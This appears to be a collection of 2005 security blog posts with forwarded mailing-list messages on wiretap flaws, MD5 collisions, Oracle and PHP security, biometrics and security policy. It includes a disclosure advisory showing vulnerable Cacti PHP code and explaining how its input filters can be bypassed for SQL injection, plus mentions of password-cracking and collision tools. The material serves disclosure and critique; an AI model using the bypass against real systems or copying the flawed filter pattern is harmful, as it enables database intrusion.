FOUNDER of the GNU project, Richard Stallman, got in trouble at the UN World Summit on the information society in Tunis for putting tin foil around his RF ID.

Signaling Vulnerabilities in Wiretapping Systems

Ahh, too bad I don't work for a telecom compnay anymore (actually, it is good). This might be fun to test out...

In a research paper appearing in the November/December 2005 issue of IEEE Security and Privacy, we analyzed publicly available information and materials to evaluate the reliability of the telephone wiretapping technologies used by US law enforcement agencies. The analysis found vulnerabilities in widely fielded interception technologies that are used for both "pen register" and "full audio" (Title III / FISA) taps. The vulnerabilities allow a party to a wiretapped call to disable content recording and call monitoring and to manipulate the logs of dialed digits and call activity. These countermeasures do not require cooperation with the called party, elaborate equipment, or special skill.

Peter Gutman wrote a great summary of the lengths that many have to go to in order to get ISAKMP implementations to interoperate.

I had a hell of a time trying to get Windows 2000/XP IPSec to work with FreeS/WAN in the past. It was very difficult to debug what was going on and I resorted to using tools that translated FreeS/WAN configuration into Windows IPSec configuration so that I was sure that the settings were correct.

>On Sat, 19 Nov 2005, Peter Gutmann wrote: >>- The remaining user base replaced it with on-demand access to network >> engineers who come in and set up their hardware and/or software for them and >> hand-carry the keys from one endpoint to the other. >> >> I guess that's one key management model that the designers never >> anticipated... I wonder what a good name for this would be, something better >> than the obvious "sneakernet keying"? > >Actually this is a good thing.

Unless you're the one paying someone $200/hour for it.

>Separation of the key distribution channel from the flow of traffic
encrypted
>under those keys. Making key distribution require human
>attention/intervention.

Somehow I suspect that this (making it so unworkable that you have to
hand-
carry configuration data from A to B) wasn't the intention of the IKE
designers :-). It's not just the keying data though, it's all
configuration
information. One networking guy spent some time over dinner recently
describing how, when he has to set up an IPsec tunnel where the
endpoints
aren't using completely identical hardware, he uses a hacked version of
OpenSWAN with extra diagnostics enabled to see what side A is sending in
the
IKE handshake, then configures side B to match what A wants. Once
that's
done, he calls A and has a password/key read out over the phone to set
up for
B.

Peter.

There are still not known attacks against encryption schemes that make use of these, but certainly anything relying on these hashes for integrity protection should switch to alternate mechanisms.

Sent: Monday, November 14, 2005 10:48 AM To: cryptography@metzdowd.com Subject: MD4 and MD5 collision generators

I am releasing my collision generators for MD4 and MD5. They have
significant time improvements over the ones described in the papers by Wang, et al.

MD4 collisions can be generated almost instantly, MD5 can be generated
in approximately 45 minutes on my p4 1.6ghz (on average).

http://www.stachliu.com/collisions.html

Enjoy
-Patrick Stach

Rainbow Crack is a time/memory tradeoff tool that can break passwords knowing just the password hash. So, those people who still think that disclosing password hashes is not a big deal...

SANS documented and proved, using a modified version of Rainbow Crack, something that I have suspected for a while. That Oracle's proprietary password hashes are weak There are plenty of good ways to do this that it's a wonder these days that people still roll-their-own crypto. The SANS team is releasing an update to Rainbow Crack that can crack Oracle passwords.

EFF: DocuColor Tracking Dot Decoding Guide

This is a breakthrough. It has been rumoured for years that printers and copy machines include secret codes on documents to track them back to the source machine but the EFF now has real evidence and even tools that you can use to perhaps decode your printer's secret tracking information.

This guide is part of the Machine Identification Code Technology project. It explains how to read the date, time, and printer serial number from forensic tracking codes in a Xerox DocuColor color laser printout. This information is the result of research by Robert Lee, Seth Schoen, Patrick Murphy, Joel Alwen, and Andrew "bunnie" Huang. We acknowledge the assistance of EFF supporters who have contributed sample printouts to give us material to study. We are still looking for help in this research; we are asking the public to submit test sheets or join the printers mailing list to participate in our reverse engineering efforts.

Hackers no hassle: Hoff - People - Entertainment - theage.com.au

Wow. Note how she says that she researches "hacking techniques" as well as the network-security-centric language throughout. A CSO should not typically be operating at this level but rather at the "big picture" strategic level.

No wonder Oracle continues having application security and patch quality problems. Their CSO seems too busy hacking the network and writing articles about it and how bad vulnerability researchers are and not enough time executing on a strategy to improve the security posture of their software and processes. Some on security mailing lists are calling for her to resign.

-Jason

-----Original Message----- From: isn-bounces@attrition.org [mailto:isn-bounces@attrition.org] On Behalf Of InfoSec News Sent: Wednesday, October 19, 2005 12:03 AM To: isn@attrition.org Subject: [spam]::[ISN] Davidson: Lessons of warfare for IT security

http://www.fcw.com/article91127-10-17-05-Web

By Mary Ann Davidson
Oct. 17, 2005

As a security professional, I research the latest issues, threats and
hacking techniques. For pleasure, however, I read mostly military
history, which shapes my view of information security. As a result, I
offer the following lessons from military history for federal agency
information technology security professionals.

Most security professionals attempt to implement programs to defend
all access points because intruders need to find only one way in. But
because agency resources are finite, boundaries typically exceed
resources. To best apply limited resources to maximize defense
success, carefully select your turf.

Risk management approaches to security must move beyond identifying
and defending the most important assets to include an analysis of a
network's strategic points where intruders could attack.

Here are some IT security lessons from military history.

* Intelligence has value only if you act on it.

The Battle of Midway in June 1942 was arguably the turning point of
World War II in the Pacific rim. The victory hinged partly on U.S.
code crackers' breaking JN25 naval cipher to learn that the Japanese
planned to attack Midway. Adm. Chester Nimitz, commander of the U.S.
Pacific fleet, sent two carrier task forces to Midway to ambush the
Japanese Navy.

A second lesson is the hubris of assuming that enemies cannot break
ciphers and codes.

Security professionals have many means of defense at their disposal.
Through network mapping, they can determine the landscape of their
networks. Knowing how many systems are locked down and adequately
patched, they can assess their readiness. Using intrusion-detection
systems, they can know the types of probes the enemy has attempted.

But some organizations don't use or act on the intelligence they have.
Many turn off their auditing systems, fail to review the logs or
ignore alarms. A military parallel is Pearl Harbor, the attack in
which the United States ignored radar detecting the incoming Japanese
planes.

* Interior defensive perimeters are critical.

The network perimeter has disappeared as ubiquitous computing and
extranet access have surged. The model of hardened perimeters and
wide-open interiors is no longer adequate.

During the 1879 defense of Rorke's Drift in South Africa, about 150
British soldiers held off 4,000 Zulus by defending the inherently
indefensible. They created makeshift barricades from grain sacks and
biscuit boxes to secure the perimeter. They had fallback positions and
used them.

Security professionals can learn from this example. A network is not
defensible if attackers breach the perimeter and the rest of the
network is wide open.

Today, administrators segment networks with interior firewalls.
Tomorrow, networks may be able to create dynamic barriers in response
to worm and virus invasions.

Admirals and generals set strategies, but individuals who make
tactical decisions and take the initiative win battles. Every federal
agency employee has a responsibility to make IT security a priority.

Davidson is Oracle's chief security officer.

Hacks From Pax: PHP Web Application Security - The Community's Center for Security

Today on Hacks From Pax we'll be discussing PHP web application security. PHP is a great language for rapidly developing web applications, and is very friendly to beginning programmers, but some of its design can make it difficult to write web apps that are properly secure. We'll discuss some of the main security "gotchas" when developing PHP web applications, from proper user input sanitization to avoiding SQL injection vulnerabilities.

And, after hurricane Katrina, I would add that on top of a "lack of protective imagination", government continues to suffer as well from "pork barrel security projects" and "visible-but-ineffective security projects" that divert precious resources away from the real or more likely threats.

An unfortunate example of this is how "The federal government will pay the overtime of cops and emergency medical workers if the drill involves an act of terrorism, but it won't if locals rehearse for a natural disaster." So, the government is still making it difficult for localities, such as Seattle, to prepare for _likely threats_ and instead they have to fake it by running drills for the more unlikely terrorism-related scenarios instead. See Is Seattle Really Ready?

The other glaringly-apparent issue is that unqualified people are being put into positions of authority of governmental agencies that are in charge of protection and response for natural disasters and other events. I have lost my belief that government can be a reliable first line of assistance and that individual citizens and localities have to take matters into their own hands to be prepared, just like you would do for a retirement plan. Don't rely on social security, welfare, or unemployment as your sole safety net and now add to that governmental response to disasters.

I'm going to be reactivating my local neighborhood disaster preparedness facility since I can't believe that if there was any kind of significant event that there could be a reasonable expectation of a decent national response.

Forwarded from: Richard Forno

The London bombs went off over 12 hours ago.

So why is CNN-TV still splashing "breaking news" on the screen?

There's been zero new developments in the past several hours.
Perhaps the "breaking news" is that CNN's now playing spooky "terror
attack" music over commercial bumpers now filled with dramatic
camera-phone images from London commuters that appeared on the Web
earlier this morning.

Aside from that, the only new development since about noon seems to be
the incessant press conferences held by public officials in cities
around the country showcasing what they've done since 9/11 and what
they're doing here at home to respond to the blasts in London.....which
pretty much comes down to lots of guys with guns running around
America's mass transit system in an effort to present the appearance of
"increased security" to reassure the public. While such activities are a
political necessity to show that our leaders are 'doing something'
during a time of crisis we must remember that talk or activity is no
substitute for progress or effectiveness.

Forget the fact that regular uniformed police officers and rail
employees can sweep or monitor a train station just as well as a
fully-decked-out SWAT team -- not to mention, they know it better, too.
Forget that even with an added law enforcement presence, it's quite
possible to launch a suicide attack on mass transit. Forget that a
smart terrorist now knows that the DHS response to attacks is to
"increase" the security of related infrastructures (e.g., train
stations) and just might attack another, lesser-protected part of
American society potentially with far greater success. In these and
other ways today following the London bombings, the majority of security
attention has been directed at mass transit. However, while we can't
protect everything against every form of attack, our American responses
remain conventional and predictable -- just as we did after the Madrid
train bombings in 2004 and today's events in London, we continue to
respond in ways designed to "prevent the last attack."

In other words, we are demonstrating a lack of protective imagination.

Contrary to America's infatuation with instant gratification, protective
imagination is not quickly built, funded, or enacted. It takes years to
inculcate such a mindset brought about by outside the box,
unconventional, and daring thinking from folks with expertise and years
of firsthand knowledge in areas far beyond security or law enforcement
and who are encouraged to think freely and have their analyses seriously
considered in the halls of Washington. Such a radical way of thinking
and planning is necessary to deal with an equally radical adversary, yet
we remain entrenched in conventional wisdom and responses.

Here at home, for all the money spent in the name of homeland security,
we're not acting against the terrorists, we're reacting against them,
and doing so in a very conventional, very ineffective manner. Yet
nobody seems to be asking why.

While this morning's events in London is a tragedy and Londoners deserve
our full support in the coming days, it's sad to see that regarding the
need for effective domestic preparedness here in the United States,
nearly 4 years after 9/11, it's clear that despite the catchy
sound-bytes and flurry of activity in the name of protecting the
homeland, the more things seem to change, the more they stay the same.

-rick
Infowarrior.org

Another example of how PHP can be dangerous. Having to know the internal workings of variable acceptance to implement secure data checking seems to negate the value of having a higher-order programming language.

And, it is common in other languages to work with variables in a REQUEST structure of some sort.

PHP should provide a built-in set of semantics for data input filtering that work across all of the possible input types so that each application doesn't have to build their own. I even remember when you used to have to build your own PHP session management or use additional PHP modules (PHPlib was a great implementation) before it got rolled into PHP 4.

Also check out the Hardened-PHP Project for this advisory and many others for PHP applications, and some PHP security basics talks.

-J

-----Original Message----- From: Stefan Esser [mailto:sesser@hardened-php.net] Sent: Saturday, July 02, 2005 12:09 AM To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Subject: Advisory 03/2005: Cacti Multiple SQL Injection Vulnerabilities [FIXED]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hardened - PHP Project
www.hardened-php.net

-= Security Advisory =-

Advisory: Cacti Multiple SQL Injection Vulnerabilities Release Date: 2005/07/01 Last Modified: 2005/07/01
Author: Stefan Esser [sesser@hardened-php.net]

Application: Cacti <= 0.8.6e
Severity: Wrongly implemented user input filters lead to
multiple SQL Injection vulnerabilities which can
lead f.e. to disclosure of the admin password hash
Risk: Critical
Vendor Status: Vendor has released an updated version
References: http://www.hardened-php.net/advisory-032005.php

Overview:

Quote from http://www.cacti.net
"Cacti is a complete network graphing solution designed to harness
the power of RRDTool's data storage and graphing functionality.
Cacti provides a fast poller, advanced graph templating, multiple
data acquisition methods, and user management features out of the
box. All of this is wrapped in an intuitive, easy to use interface
that makes sense for LAN-sized installations up to complex
networks with hundreds of devices."

Because it is usually fun to audit software which was previously
audited by experts from iDEFENSE we scanned through their reported
vulnerabilities and found that most are not properly fixed.

Details:

With the recent release of iDEFENSE's Cacti advisories version
0.8.6e of Cacti was released which according to iDEFENSE fixes
all reported flaws. But this is not true.

However the user input filters that were added to the Cacti
codebase to address the possible SQL Injections are wrongly
implemented and therefore can be tricked to let attackers
through.

To demonstrate the problem here a snipset of "graph.php"

/* ================= input validation ================= */
input_validate_input_regex(get_request_var("rra_id"), "^([0-9]+|all)$");
input_validate_input_number(get_request_var("local_graph_id"));
/* ==================================================== */

if ($_GET["rra_id"] == "all") {
$sql_where = " where id is not null";
}else{
$sql_where = " where id=" . $_GET["rra_id"];
}

On the first look this code looks safe, because it checks that
the 'rra_id' request parameter is either a number or the string
"all" before inserting it into a part of the SQL Query.

To realize that this check is however worth nothing one has to
dig deeper and look into the implementation of get_request_var()

function get_request_var($name, $default = "")
{
if (isset($_REQUEST[$name]))
{
return $_REQUEST[$name];
} else
{
return $default;
}
}

This actually means that the filter in this example is applied to
the content of $_REQUEST["rra_id"] and not to $_GET["rra_id"].
The problem with this is, that $_REQUEST is a merged version of
the $_GET, $_POST and $_COOKIE arrays and therefore array keys of
the same name will overwrite each other in $_REQUEST.

In the default configuration of PHP which is usually not changed
by anyone the merge order is GPC. This means when the request
contains both $_GET["rra_id"] and $_POST["rra_id"], only the
posted value will end up in the $_REQUEST array.

This however means, that nearly all of the implemented filters can
be bypassed by supplying the attack string through the URL and
supplying a good string through POST or through the COOKIE.

Proof of Concept:

The Hardened-PHP Project is not going to release exploits
for this vulnerabilities to the public.

Disclosure Timeline:

25. June 2005 - Contacted Cacti developers via email
29. June 2005 - Review of patch from our side
1. July 2005 - Release of updated Cacti and Public Disclosure

Recommendation:

We strongly recommend upgrading to Cacti 0.8.6f which you can get at

http://www.cacti.net/download_cacti.php

Summary for Secunia:

Because Secunia proofed several times in the past, that they have
enormous problems with reading advisories and crediting the right
parties in their advísory rip-offs, here a short summary.

This bug was not found by iDEFENSE. On the contrary it is a bug
in the input filters that were implemented because of iDEFENSE
and where nodded through by them.

GPG-Key:

http://www.hardened-php.net/hardened-php-signature-key.asc

pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1

Copyright 2005 Stefan Esser. All rights reserved.

High-Entropy Randomness Generator

In this paper, we explain how to construct a High-Entropy Randomness Generator, suitable for a wide range of applications, including extremely demanding ones. We will explain and then use some key theoretical ideas:

* We start with a raw input, typically from a good-quality sound card.
* We obtain a reliable lower bound on the raw input’s entropy density (as defined in appendix A). This is calculated based on physics principles plus a few easily-measured macroscopic properties of the sound card. (This stands in stark contrast to other approaches, which obtain a loose upper bound based on statistical tests on the data.)
* We make use of the hash saturation principle, as discussed in section 3.2. The resulting output has essentially 100% entropy density. This is provably correct under mild assumptions.
* We use no secret internal state and therefore require no seed.
* We do not depend on assumptions about “one-way functions”.

We have implemented a generator using these principles. The result is what most people would call a True Random Number Generator. Salient engineering features include:

* It costs next to nothing. It uses the thermal fluctuations intrinsic to the computer’s audio I/O system.
* It emphatically does not depend on imperfections in the audio I/O system. Indeed, high-quality sound cards are much more suitable than low-quality ones. It relies on fundamental physics, plus the most basic, well-characterized properties of the audio system: gain and bandwidth.
* It can produce thousands of bytes per second of output.
* Remarkably little CPU time is required.
* It includes optional integrity-monitoring and tamper-resistance capabilities.

I dug this out for additional evidence of how PHP gives programmers too much rope to hang themselves, not unlike C.

-J

-----Original Message----- From: David Wheeler [mailto:dwheeler@ida.org] Sent: Wednesday, August 08, 2001 2:06 PM To: me Subject: PHP

Ben Ford said:

>>Don't call it a weakness of the language, call it by its true name:
>> Lazy Programming.

If this was a common problem in other languages, I might agree with you.
But it's not. Essentially all other computer languages do _NOT_ let
attackers set the state of arbitrary program variables to arbitrary
values, and then require programmers to constantly reset
values if they'd like to prevent attackers from controlling them.

I'm not saying that PHP is some horrible, unfixable language.
I've posted to PHP-DEV a relatively simple set of changes that would
make it possible to eliminate the problem, and others have proposed
other approaches. And those who can control their PHP configuration can
obviously do so and eliminate the problem right now for their
applications.

Yes, you can write secure applications in PHP. But it requires
herculean effort. It's "obvious" when the application is small
that some variable needs to be unset, that's true, assuming you know to
look.
But once you call functions, you have to have global knowledge of all
global values that the function uses, including the complete transitive
closure of all functions it calls directly & indirectly -- and that
INCLUDES the implementation of the library functions you call. And you have to
redo the analysis when you use a new version of PHP. You could argue
that all PHP developers do this... but I wouldn't believe you.

It's certainly true that all languages have "gotchas".
This one is larger than most (in my opinion), though. And we should be
striving in our computer languages to make it easy, not hard, to write
secure programs.

If some application can be used securely in theory, but its user
interface is so hard to use that it cannot PRACTICALLY be used securely,
then it's still insecure. I argue that the same is true for programming languages.

I've been wondering lately if PHP is much like C from a security perspective in that the chances that if you are using PHP for an application that your application is secure depends on tribal knowledge about "what not to do" with the basic language. Another way to say this is that like C, PHP gives you plenty of rope to hang yourself if you don't know what you are doing. Which is unfortunate for a language that should be safer by default for use by UI programmers.

This posting from Andrew van der Stock brings up some specific issues with the PHP language that could really help improve security in the same way that GCC compiler warnings when using insecure functions help with awareness.

-----Original Message----- From: Andrew van der Stock [mailto:vanderaj@greebo.net] Sent: Friday, June 24, 2005 10:07 PM To: Benjamin Livshits Cc: webappsec@securityfocus.com Subject: Re: Languages/platforms used for Web apps. Any stats?

I don't know of any stats, but if anyone was to make a study, that's
where I'd focus on.

However, saying that:

* I review J2EE finance apps used in very large institutions. I find
plenty of problems which need fixing
* I look after a PHP forum, which definitely could improve
* In my previous job, the most vulnerable app I ever reviewed was
written in ASP in VBScript

I don't think the language has much to do with it beyond basic security
posture. PHP could do a lot to redress the problems, for example, by:

* making echo do htmlentities by default, and having a special echo /
print which doesn't in case you really meant to spit out HTML
* deprecating the old function based MySQL drivers (ie warnings when
E_ALL is used) in favor of the MySQLi drivers or PDO which have prepared
statements
* in the next version of PHP, remove support for register_globals and
make url_fopen permanently false
* Remove implicit declarations and add optional strong typing which
really means it

The basic security posture of PHP has been improving, but honestly, it
really depends on the quality of the coders and if they are aware of the
security options open to them. The other thing is that there is a lot of
PHP code out there written in the PHP 3 days which sorta runs okay on
PHP 4 and 5, which shouldn't. PHP 3 really was a security nightmare -
everything in the interpreter was set to be the most insecure possible
posture with maximal attack surface area.

Some interesting results found in a study of 2000-2004 election data.

We first show that there is a positive correlation between use of touch-screen voting and the level of electoral support for George Bush. This is true in models that compare the 2000-2004 changes in vote shares between adopting and nonadopting counties within a state, after controlling for income, demographic composition, and other factors. Although small, the effect could have been large enough to influence the final results in some closely contested states.

They also found:

Touch-screen voting could also indirectly affect vote shares by influencing the relative turnout of different groups. We find that the adoption of touch-screen voting has a negative effect on estimated turnout rates, controlling for state effects and a variety of county-level controls.

This is not so much about Islam vs. Christianity (although I think a lot of wacky Christians are making this case still) Courtesy of Bruce Schneier.

An absolutely fascinating interview with Robert Pape, a University of Chicago professor who has studied every suicide terrorist attack since 1980. "The central fact is that overwhelmingly suicide-terrorist attacks are not driven by religion as much as they are by a clear strategic objective: to compel modern democracies to withdraw military forces from the territory that the terrorists view as their homeland."

His book:
or
Reviews:

Financial Cryptography: "Acceptable Risk" - a Euphemism for Selling Fraud?

This is a post from a while back but is still relevant to recent discussions about how the financial industry is still shifting the burden of identity theft and fraud to the customers. Bruce Schneier just wrote about this in regards to phishing in the most recent edition of Crypto-Gram as well.

The "acceptable risk" concept [writes guest financial cryptographer Ed Gerck] that appears in recent threads has been for a long time a euphemism for that business model that shifts the burden of fraud to the customer.

The dirty little secret of the credit card industry is that they are very happy with 10% of credit card fraud, over the Internet or not.

In fact, if they would reduce fraud to zero today, their revenue would decrease as well as their profits. So, there is really no incentive to reduce fraud. On the contrary, keeping the status quo is just fine.

InformationWeek > Biometric Security > Privacy Concerns, Expense Keep Biometrics Out Of U.S. ATMs > October 12, 2005

This article is chock full of fun things to comment on.

Ricardo Prieto, who was vice president for system operations at BanCafe when the system was installed, said that at first ATMs failed to recognize fingerprints on the well-worn hands of some elderly customers and laborers such as construction workers.

He said the ATM imaging was improved, and the number of customers whose fingerprints couldn't be read fell from 30 percent to 8 percent.

Wow, that is great progress! Now for a large bank, only 2 million instead of 7.5 million customers will not be able to use my bank's ATMs! Where do I sign?

"Biometrics is certainly the most secure form of authentication," said Avivah Litan, an analyst with Gartner Inc., a Stamford, Conn.-based technology analysis firm. "It's the hardest to imitate and duplicate."

He's right. It is very difficult to "imitate and duplicate" biometrics in ways that could fool sensors.

I also would argue that biometrics is not the most secure form of authentication. Smart cards and tokens are hard to imitate and duplicate and this isn't even a threat model to be concerned about in general because in practice, nobody uses this factor as the only factor. These are used as part of a two-factor authentication system, which is really a much more secure form. For some bizarre reason, biometric holy-grail folks (mostly vendors, I imagine) think that biometrics don't need a second factor. Additionally, there is a nonzero False Acceptance Rate and False Reject Rate (as noted beautifully above) that make biometrics fail in many real world scenarios. Smart cards don't have that problem.

"The real holy grail in biometrics," said Jim Block, Diebold's director of global advanced technology, "is let's get rid of the PIN so no one has anything to steal anymore."

Let's think about that for a minute. Let's ignore for a moment that this came from Diebold, a foremost authority in voting security. He claims that without a PIN, there would be nothing to steal anymore. Really?

Actually, having a PIN or another second factor can help to thwart these kinds of "steal the biometric" attacks since the biometric by itself is rendered useless. It certainly won't eliminate the threat, but I think it would reduce the likelihood that someone would violently extract the biometric to steal something since they need you alive anyhow to get the PIN or password.

Funny and entertaining and sad rant about Oracle's inability to do security in stark contrast to public claims by their CSO, marketing, etc.

This has inspired others to note how there are some Oracle vulnerabilities that have been open for 768 days!! among other comments. Oracle even tried to put the cat back in the bag on some other disclosed vulnerabilities recently. They just don't get it. I'm wondering if Larry Ellison were in Bill Gate's place just how much worse off the Internet and world would be from a security perspective.

---------- Forwarded message ---------- From: David Litchfield To: bugtraq@private, ntbugtraq@private Date: Thu, 6 Jan 2005 16:01:26 -0000 Subject: Opinion: Complete failure of Oracle security response and utter neglect of their responsibility to their customers

Dear security community and Oracle users,

Many of my customers run Oracle. Much of the U.K. Critical National
Infrastructure relies on Oracle; indeed this is true for many other
countries as well. I know that there's a lot of private information
about me stored in Oracle databases out there. I have good reason,
like most of us, to be concerned about Oracle security; I want Oracle
to be secure because, in a very real way, it helps maintain my own
personal security. As such, I am writing this open letter

Extract from interview between Mary Ann Davidson and IDG
http://www.infoworld.com/article/05/05/24/HNoraclesecurityhed_1.html

IDGNS: "What other advice do you have for customers on security?"

Davidson: "Push your vendor to tell you how they build their software
and ask them if they train people on secure coding practices. "

Now some context has been put in place I can continue.

On the 31st of August 2004, Oracle released a security update (Alert
68 [ http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf ])
to address a large number of major security flaws in their database
server product. The patches had been a long time in coming
[ http://www.eweek.com/article2/0,1759,1637213,00.asp ] and we fully
expected that these patches would actually fix the problems but,
unfortunately this is not the case. To date, these flaws are still not
fixed and are still fully exploitable. I reported this to Oracle a
long time ago.

The real problem with this is not that the flaws Alert 68 supposedly
fixed are still exploitable, but rather the approach Oracle took in
attempting to fix these issues. One would expect that, given the
length of time they took to deliver, these security "fixes" would be
well considered and robust; fixes that actually resolve the security
holes. The truth of the matter though is that this is not the case.

Some of Oracle's "fixes" simply attempt to stop the example exploits I
sent them for reprodcution purposes. In other words the actual flaw
was not addressed and with a slight modification to the exploit it
works again. This shows a slapdash approach with no real consideration
for fixing the actual problem itself.

As an example of this, Alert 68 attempts to fix some security holes in
some triggers; the flaws could allow a low privileged user to gain SYS
privileges - in other words gain full control of the database server.
The example exploit I sent to Oracle contained a space in it. Oracle's
fix was to ignore the user's request if the input had a space. What
Oracle somehow failed to see or grasp was that no space is needed in
the exploit. This fix suggests no more than a few minutes of thought
was given to the matter. Why did it take 8 months for this? Further,
how on earth did this get through QA? More, why are we still waiting
for a proper fix for this?

Here is another class of thoughtless "fix" implemented by Oracle in
Alert 68. Some Oracle PL/SQL procedures take an arbitrary SQL
statement as a parameter which is then executed. This can present a
security risk. Rather than securing these procedures properly Oracle
chose a security through obscurity mechanism. To be able to send the
SQL query and have it executed one needs to know a passphrase. This
passphrase is hardcoded in the procedure and can be extracted with
ease. So all an attacker needs to do now is send the passphrase and
their arbitrary SQL will still be executed.

In other cases Oracle have simply dropped the old procedures and added
new ones - with the same vulnerable code!

I ask again, why does it take two years to write fixes like this?
Perhaps the fixes take this long because Oracle pore through their
code looking for similar flaws? Does the evidence bear this out. No -
it doesn't. In those cases where a flaw was fixed properly, we find
the same flaw a few lines further down in the code. The DRILOAD
package "fixed" in Alert 68 is an example of this; and this is not an
isolated case. This is systemic. Code for objects in the SYS, MDSYS,
CTXSYS and WKSYS schemas all have flaws within close range of "fixed"
problems. These should have been spotted and fixed at the time.

I reported these broken fixes to Oracle in February 2005. It is now
October 2005 and there is still no word of when the "real" fixes are
going to be delivered. In all of this time Oracle database servers
have been easy to crack - a fact Oracle are surely aware of.

What about the patches since Alert 68 - the quarterly Critical Patch
Updates? Unfortunately it is the same story. Bugs that should have
been spotted left in the code, brand new bugs being introduced and old
ones reappearing.

This is simply NOT GOOD ENOUGH. As I stated at the beginning of this
letter, I'm concerned about Oracle security because it impinges upon
me and my own personal security.

What is apparent is that Oracle has no decent bug
discovery/fix/response process; no QA, no understanding of the
threats; no proactive program of finding and fixing flaws. Is anyone
in control over at Oracle HQ?

A good CSO needs to more than just a mouthpiece. They need to be able
to deliver and execute an effective security strategy that actually
deals with problems rather than sweeping them under the carpet or
waste time by blaming others for their own failings. Oracle's CSO has
had five years to make improvements to the security of their products
and their security response but in this time I have seen none. It is
my belief that the CSO has categorically failed. Oracle security has
stagnated under her leadership and it's time for change.

I urge Oracle customers to get on the phone, send a email, demand a
better security response; demand to see an improvement in quality.
It's important that Oracle get it right. Our national security depends
on it; our companies depend on it; and we all, as individuals depend
on it.

Cheers,
David Litchfield

The Seattle Times: Business & Technology: Glitch forces fix to cockpit doors

Well, "Open Sesame" works if you say it through a nearby walkie-talkie:

For more than two years, U.S. airplane passengers have flown more securely because high-tech cockpit doors created a barrier to prevent a repeat of 9/11, when terrorists entered the cockpit and commandeered four planes.

But, the doors were not foolproof.

In December 2003, a Northwest Airlines maintenance mechanic inside an Airbus A330 jet on the ground in Minneapolis pushed the microphone button to talk into his handheld radio. Though he hadn't touched the cockpit door, he heard the sound of its lock operating.

So, other on-board avionics and electronics has to meet strict EMI standards to get on an airplane, but not the new cockpit doors??? Let me guess, the Bush Administration and Congress exempted this new equipment from typical safety and other regulations after 9-11 since those aren't important when there are terrorists out there?

Usable Security Blog Archive O’Reilly Book: Security and Usability

One of the research areas that I am very interested in:

O’Reilly has released Security and Usability: Designing Secure Systems That People Can Use, a collection of 34 essays on security and usability edited by Lorrie Cranor and Simson Garfinkel.

Firewalls a dangerous distraction says expert

I don't know who Abe Singer is but he makes a great point that I have been touting for years. Look at your infosec program and count how many people you have dealing directly with firewalls. Now, count how many people you have dealing with application security audits, standards, reviews, etc. More than likely, you only need one hand to count the latter. That is why there is such a problem with insecure applications on the Internet. It starts with misunderstanding your threat model and continues with inadequate staffing and misplaced priorities

A preoccupation with firewalls is diverting attention and resources away from the more important issue of locking systems down, according to an expert.

Computer security researcher at the San Diego Supercomputing Center
(SDSC), Abe Singer said companies can spend 90 percent of their security
efforts on firewalls and not much of anything else. "I'm not saying
firewalls are completely irrelevant, but how much effort do you spend on
security?" Singer asked. "Do security at the host, not just the
perimeter. You should be worried about what users are doing, because if
an attacker is going through the perimeter [without secure hosts] then
it's game over."

As the REAL ID act meets reality, recall a previous report on DMV fraud and lax security. If you think you have problems budgeting for security in your company, imagine being handed an unfunded mandate from the federal government. Do you think current problems will magically go away?

Date: Mon, 2 Feb 2004 09:50:52 -0500 From: Monty Solomon Subject: Security Holes at DMVs Nationwide Lead to ID Theft and Safety Concerns

CDT (http://www.cdt.org/) has issued a report entitled "Unlicensed
Fraud"
(http://www.cdt.org/privacy/20040200dmv.pdf) documenting rampant
internal fraud and lax security at state motor vehicle administration
offices across the country placing the reliability of all driver's
license at risk. While heavy public attention has been placed on new
national standards and new technologies for driver's licenses, studying
local news reports from throughout 2003 CDT finds that basic management
processes to stop bribery and theft are lacking. In the report, CDT
offers policy recommendations to address this dire issue. February 2,
2004

In a posting to the cryptography mailing list. Interesting statistics in the presentation. Update your threat models!

Folks might want to look at http://www.huitema.net/talks/ietf63-security.ppt the slides from a talk Christian Huitema gave at the Applications Area at IETF63 this past week. Of particular interest is just how cheap it is to brute-force a passphrase these days, especially if it's just used as a cryptographic key with known plaintext (i.e., in challenge/ response protocols).

--Steven M. Bellovin, http://www.cs.columbia.edu/~smb

Glad I'm sticking with the Neuros which doesn't run Windows now and
will run Linux in the next version. Not to mention the open source aspects and the ability to play OGG/Vorbis audio files...

http://rss.slashdot.org/Slashdot/slashdot?m=251

In this article, OSS means slower patches, David Sykes from Symantec makes some absurd claims about open source being slower to patch than closed source.

"It is relying on the goodwill and best efforts of many people, and that doesn't have the same commercial imperative," he said. "I'm sure that is part of what is causing the blow-out in the patch window."

So... "commercial imperative" is a requirement to be quick with patches? Where has this guy been for the past 10+ years when commercial vendors have done everything to thwart publication of vulnerabilities and have been the slowest to patch (and still are, such as Oracle and Cisco).

Also, "I'm sure [relying on the goodwill and best efforts of many people] is part of what is causing the blow-out in the patch window" is entirely an opinion statement. But there are actual people with actual data working on the mozilla project who the reporter or even Mr Sykes could have asked. But no, they go with the unsubstantiated opinion of a purported expert on the matter instead.

Of course, Mr Sykes has a vested interest in maintaining a level of fear in users to keep buying Symantec products to protect them.

Fortunately, the Mozilla organization has hit back with the facts: Mozilla hits back at browser security claim

He also argued that, according to security company Secunia's statistics, the Microsoft vulnerabilities were more critical, and had been so over a longer timescale. In the period 2003 to 2005 Secunia have issued 22 security advisories regarding Firefox 1.x, and rate it as "less critical". In the same period Microsoft Internet Explorer 6.x had 85 Secunia advisories, and is rated as "highly critical".

"Basically their vulnerabilities are more critical. With Firefox — yeah, you have holes, but they're much less serious." Nitot likened the differences between Firefox and IE vulnerabilities as being like injuries: "Which would you prefer, to have a broken finger, or your head ripped off?"

A book that I am reading right now:

Between Silk and Cyanide A true story of cryptography in the field during WWII.

A free 900 page eBook from Microsoft Press: Improving Web Application Security: Threats and Countermeasures

You may want to just buy a paper copy since it weighs in at 3-4 inches of paper (I have a copy of the "real" book and it's big).

Another book that sounds interesting:

Secrets of Computer Espionage: Tactics and Countermeasures "Covers electronic and wireless eavesdropping, computer surveillance,
intelligence gathering, password cracking, keylogging, data duplication, black bag computer spy jobs, reconnaissance, risk assessment, legal issues, and advanced spying techniques used by the government.

Author shares easily-implemented countermeasures against spying to
detect and defeat eavesdroppers and other hostile individuals.

Addresses legal issues, including the U.S. Patriot Act, legal spying in the workplace, and computer fraud crimes. "

Repeat after me: Identifiers are not Authenticators.

